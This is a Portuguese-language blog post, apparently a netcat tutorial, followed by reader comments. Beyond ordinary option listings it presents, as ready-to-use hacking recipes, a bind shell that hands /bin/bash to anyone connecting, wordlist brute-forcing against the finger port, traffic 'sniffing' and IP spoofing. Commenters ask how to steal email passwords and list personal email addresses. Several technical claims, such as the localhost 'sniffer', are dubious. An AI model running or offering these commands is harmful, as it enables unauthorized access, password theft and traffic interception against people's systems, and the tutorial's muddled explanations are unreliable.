ta ai..... o tutorial e logo abaixo o link do download do NetCat
para começar
$ nc -h
-e "comando" .:[ Executa o comando especificado usando como entrada (stdin) os dados recebidos pela rede e enviando os dados de saída (stdout e stderr) para a rede. Essa opção somente estará presente se o nc for compilado com a opção GAPING_SECURITY_HOLE, já que permite que usuários disponibilizem programas para qualquer um conectado a rede. ]:.
-i .:[ Especifica o intervalo de tempo no qual as linhas de texto serão enviadas ou recebidas. ]:.
-l .:[ Coloca no netcat em estado de escuta (listening) ]:.
-L .:[Coloca no netcat em estado de escuta (listening), reiniciando o netcat com a mesma linha de comando caso a conexão feche ]:.
-n .:[ Força o netcat a usar apenas endereços de IP numéricos, sem fazer consultas a servidores DNS; ]:.
-o "filename" .:[ Usando para obter um log dos dados de entrada ou saída, em formato hexadecimal; ]:.
-p .:[ Especifica a porta a ser usada, sujeito a disponibilidade e a restrições de privilégio; ]:.
-r .:[ Faz as portas do portscan serem escolhidas aleatóriamente; ]:.
-s .:[ Especifica o endereço IP da interface usada para enviar os pacotes. Pode ser usado para spoofing de IPs, bastando apenas configurar uma interface do tipo eth0:0 (usando o ifconfig) com o IP desejado; ]:.
-t .:[ Permite usar o nc para criar sessões de telnet por script. Precisa estar compilado com a opção -DTELNET; ]:.
-u .:[ Usar UDP ao invés de TCP ]:.
-v .:[ Controla o nível de mensagens mostradas na tela; ]:.
-w .:[ Limita o tempo máximo para que uma conexão seja estabelecida; ]:.
-z .:[ Para evitar o envio de dados através de uma conexão TCP, e limitar os dados de uma conexão UDP. ]:.
É muito importante lembrar que comandos e sintaxes do Linux podem ser misturadas, assim como a utilização de pipes( ), <, > e >>.
Veremos agora, a versatilidade e utilização dos comandos em ação, ou seja a mão na massa:
1- Conectando-se a um host
É feita da mesma maneira que o telnet. É especificado apenas um host e a porta a se conectar.
Exemplos:
$ nc mail.yahoo.com.br 110
$ nc www.uol.com.br 80
Lembrando que a porta 110 é dos servidores de POP3 e a 80 é de servidores web.
2- Abrindo uma porta (listenning)
É utilizada a sintaxe -l para colocar em listenning e -vv para retornar eco com detalhes.
A seguir é estipulada a porta:
$ nc -l -p 53 -vv
Será retornada uma mensagem: "listenning on [any] 53 ... "
3- Transferindo Arquivos
Transferir arquivos de um host para outro usando o netcat é bastante simples. Basta configurar o lado server (que vai receber o arquivo) para "escutar" uma porta específica e redirecionar todos os dados recebidos para um arquivo. Colocando-se um timeout, o servidor irá perceber quando não existem mais dados chegando e irá fechar a conexão.
No lado cliente da conexão, simplesmente conecta-se à porta do servidor e passa-se o arquivo a ser tranferido como entrada.
Servidor:
$ nc -vvn -l -p 3000 -w 30 > file
Listening on any address 3000
Cliente:
$ nc -vvn -w 2 10.0.0.1 3000 <>
O servidor irá mostrar a seguinte mensagem quando uma conexão for estabelecida:
Connection from 10.0.0.1:1028
Novamente, a conexão deve ser terminada usando-se o CTRL-C. O servidor irá mostrar:
Exiting.
Total received bytes: 6
Total sent bytes: 0
Enquanto que o cliente mostrará:
Total received bytes: 0
Total sent bytes: 6
Será feita uma tentativa de conexão à um IP ou host e será estipulada as portas da tentativa de conexão:
$ nc -vv www.qualquer_site.com.br 110 80 139
$ nc -vv www.qualquer_site.com.br 1-10000
No primeiro exemplo serão escaneadas apenas as portas 110 (POP3), 80 (web) e 139 (compartilhamento do Windows). Já no segundo exemplo serão escaneadas desde a porta 1 até a 10000. (range port de 1-10000)
5- Abrindo a porta, dando acesso a uma "shell" .:[ Trojan ]:.
Será colocada a porta X em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador. Funciona de forma semelhante a um trojan.
$ nc -l -e /bin/bash -p 2332
Nesse caso acima quem se conectar à máquina na porta 2332 terá acesso irrestrito nela.
6- Usando como brute-force
Comando:
$ nc -vv 79 < ~/wordlists.txt > bruteforce_OK.log
Note que conectaremos a porta do FINGER(79) e redirecionaremos o conteúdo do arquivo wordlists.txt para essa porta. Quando algum resultado for válido ele será salvo em bruteforce.log para uma análise posterior dos resultados.
Lembrem-se, ssh ele dropa e faz LOG das conexões após três tentativas de conexão. Então muito cuidado ao usar o brute force.
7- Fazendo um sniffer
Além de tudo isto demonstrado acima, o Netcat ainda pode capturar todo o tráfego de uma rede. Iremos nos conectar a uma porta e mandar o netcat "dar eco" nela, ou seja, exibir TUDO o que passa por ela. Após isso, é só redirecionar tudo o que o Netcat gravou para um arquivo.
Veja o comando, para melhor compreensão:
$ nc -vv -L 127.0.0.1 -p 80 > ~/sniffing.log
Nesse caso todos os dados que passarem pela porta 80 da sua máquina (127.0.0.1) será gravado no arquivo sniffing.log
8 - IP Spoofing
Usando o netcat, você pode fazer inclusive spoofing de endereços IP. Se você estiver escutando o tráfego em um segmento, você pode enviar esse tráfego para outro host usando o protocolo UDP.
O comando deverá ser tipo:
$ tcpdump -l -xX -vvv -tttt | nc -u -s spoofed_ip listener_ip
Isso também requer que você configure o endereço IP spoofed para um alias na sua interface de rede:
$ ifconfig eth0:N spoofed_ip
Link para download:
download
(versão para Windows)
4 comentários:
Daew
Td bem ?
Preciso saber como faço para excluir um video do Youtube ! Ou alguem que faça esse serviço ou pegar senha de email . Urgente
Mande email para dr_broering@terra.com.br
Grato !
ou, quero sabe como viro HACKER no TIBIA e no RAGNAROK
meu email é:
matheusbazzi@hotmail.com
Eae blz?
Sou iniciante, na area de informática estou, querendo saber como é que funciona e quero me torna um hacker um dia sei que não, é da noite pro dia, mais estou procurando entender cada vez, sobre informática, computadores, rede, e internet no geral, e sobre area hacker.
Já tentei de tudo e estou sempre fazendo pesquisas.
Gostaria, de saber o se o brute force do netcat da pra usar para descobrir senhas de email?
Sem maldade me tira essa dúvida ai.
Agradeço, desde a já a todos pela atenção.
Mande email para dg406@hotmail.com
Urgente
Abraços a todos!
/Tenso....
Tenta quebrar a força bruta mais vai um bom tempo ai.....
Postar um comentário